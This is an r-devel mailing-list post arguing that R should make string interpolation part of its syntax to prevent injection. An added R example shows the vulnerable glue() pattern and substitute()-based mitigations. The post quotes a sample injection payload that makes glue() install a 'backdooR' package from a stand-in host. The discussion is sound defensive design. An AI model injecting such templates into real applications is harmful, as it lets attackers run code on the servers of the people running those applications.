On Mon, 15 Dec 2025 10:25:02 -0800
Henrik Bengtsson <[email protected]> writes:
> In order to safely introduce string interpolation, I think the best
> would be to introduce a standard syntax that would allow for static
> code inspection, e.g. g"hello ${name}". That would make it possible to
> validate the string interpolation during parsing, or immediately
> after, but before evaluation.
Making this a feature of syntax, not just the runtime, has another
important property of preventing injection vulnerabilities.
If, say, a Shiny application gives user input to glue::glue(), then
game over: the user can just ask it to format a string containing
'{install.packages("backdooR", repos="https://example.invalid")}'. With
string interpolation as part of syntax for strings, this will only
happen with trusted source code, as few applications will deliberately
call eval(parse(...)) on untrusted user input.
(In theory, 'glue' could substitute() the argument to make sure it's a
> string constant, but the way it currently works is definitely more
convenient.)
--
Best regards,
Ivan
______________________________________________
[email protected] mailing list
https://stat.ethz.ch/mailman/listinfo/r-devel
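The injection scenario and the substitute()-based mitigation described in the message above, as an added R example that is not part of the original post, of R itself or of the 'glue' package. The `user_input` value, the `unsafe_greet`/`safe_greet` functions and the `glue_literal` wrapper are all constructed here for illustration; only `glue::glue()` and its `.envir` argument are real.

```r
library(glue)

# Constructed stand-in for text arriving from an untrusted Shiny input.
# The braces are the attacker's: glue will evaluate whatever is inside
# them if this string is ever used as the *template*.
user_input <- "Hello {2 * 21}"

# Vulnerable pattern: the user's text becomes the template, so glue parses
# and evaluates the code between the braces (a harmless expression here).
unsafe_greet <- function(template) glue::glue(template)
unsafe_greet(user_input)   # "Hello 42": the braces were executed as R code

# Mitigation 1: the template is a constant in trusted source code and the
# user's text is passed only as a value, so its braces are never parsed.
safe_greet <- function(who) glue::glue("Hello {who}")
safe_greet(user_input)     # "Hello Hello {2 * 21}": braces stay literal

# Mitigation 2: the substitute() check mentioned in the message. The wrapper
# inspects the unevaluated argument and refuses anything that is not a
# string literal at the call site, so a computed template cannot reach glue.
glue_literal <- function(template, ..., .envir = parent.frame()) {
  expr <- substitute(template)
  if (!is.character(expr) || length(expr) != 1L) {
    stop("glue_literal(): template must be a string literal, not a value",
         call. = FALSE)
  }
  glue::glue(template, ..., .envir = .envir)
}

# Accepted: literal template, untrusted text supplied as data.
glue_literal("Hello {who}", who = user_input)   # "Hello Hello {2 * 21}"

# Rejected: the template is a variable, which is exactly the injection path.
tryCatch(glue_literal(user_input),
         error = function(e) conditionMessage(e))
```

The `substitute()` check catches the common mistake at the call site, which is as close as a runtime library can get to the parse-time validation Henrik describes; it cannot, of course, see through a literal that was itself built by pasting user input into source text passed to `eval(parse(...))`, which is the case the message already sets aside as rare.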